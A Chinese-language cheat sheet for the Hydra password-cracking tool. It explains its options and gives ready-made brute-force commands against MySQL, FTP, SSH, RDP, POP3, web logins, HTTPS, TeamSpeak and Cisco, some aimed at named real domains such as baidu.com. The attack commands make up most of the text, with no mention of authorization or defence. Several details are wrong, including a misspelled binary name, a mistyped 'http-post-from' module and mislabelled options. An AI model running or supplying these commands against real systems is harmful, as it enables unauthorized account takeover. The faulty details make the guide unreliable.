Hydra 简单操作

参数详解：

-m  指定目标列表文件一行一条

-f    破解出来一个密码之后就停止
-R　继续上一次的进程进行破解
-S　使用SSL协议连接
-s　PORT 指定端口，如果非默认端口可以这个参数指定
-l 　LOGIN 指定用户名
-L   PASS 指定指定用户名字典(文件)，比较少用，一般使用密码字典
-P   FILE 指定的密码字典(文件)
-e    ns 空密码探测(n)，指定的用户密码探测(s)
-C   FILE 用户名可以用:分割(username:password)可以代替-l username -p password
-o   FILE 指定结果输出文件
-t   TASKS 指定多线程数量，默认为16个线程
-v/-V 显示详细过程
server 目标IP
service 指定要破解的内容(如：telnet ftp pop3 mssql mysql ssh ssh2......)

 

1、破解mysql密码

hydra.exe -L C:\111.txt -P C:\222.txt 192.168.0.0 mysql

使用-L指定我们需要的用户名文件，-P指定字典

2、破解ftp

hydra.exe -l admin -P C:\222.txt -t 5 192.168.0.0 ftp

使用-l指定用户名，-t指定线程数，-P指定密码字典

3、破解ssh

hysra.exe -L C:\111.txt -P C:\222.txt -e n -t 5 -vV 192.168.1.1 ssh

使用-e n对空密码探测

4、破解rdp

hydra.exe -l administrator -P C:\222.txt www.xxx.com rdp -V

破解www.xxx.com的rdp服务，远程桌面协议

5、破解pop3

hydra.exe -l root -P C:\222.txt baidu.com pop3

6、get方式提交，破解web登录

hydra.exe -l admin -P C:\222.txt -vV -e ns IP http-get /admin/

hydra.exe -l admin -P C:\222.txt -vV -e ns -f IP http-get /admin/index

用-f，破解出来一个密码之后就停止，IP是目标ip，get方式

7、post方式提交，破解web登录

hydra.exe -l admin -P C:\222.txt -vV -e ns -f IP http-post-from

8、破解https

hydra.exe -m /index.php -l admin -P C:\222.txt IP https

9、破解teamspeak

hydra.exe -l admin -P C:\222.txt -s 端口 -vV IP teamspeak

10、破解cisco

hydra.exe -P C:\222.txt cisco

有很多的服务此工具都可以破解，拥有强大的字典，加上知道你过的参数就能很好的完成。

hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] | [-C FILE]] [-e nsr] [-o FILE] [-t TASKS] [-M FILE [-T TASKS]] [-w TIME] [-W TIME] [-f] [-s PORT] [-x MIN:MAX:CHARSET] [-SuvV46] [service://server[:PORT][/OPT]]

支持的服务和协议：telnet ftp pop3[-ntlm] imap[-ntlm] smb smbnt http[s]-{head|get} http-{get|post}-form http-proxy cisco cisco-enable vnc ldap2 ldap3 mssql mysql oracle-listener postgres nntp socks5 rexec rlogin pcnfs snmp rsh cvs svn icq sapr3 ssh2 smtp-auth[-ntlm] pcanywhere teamspeak sip vmauthd firebird ncp afp等等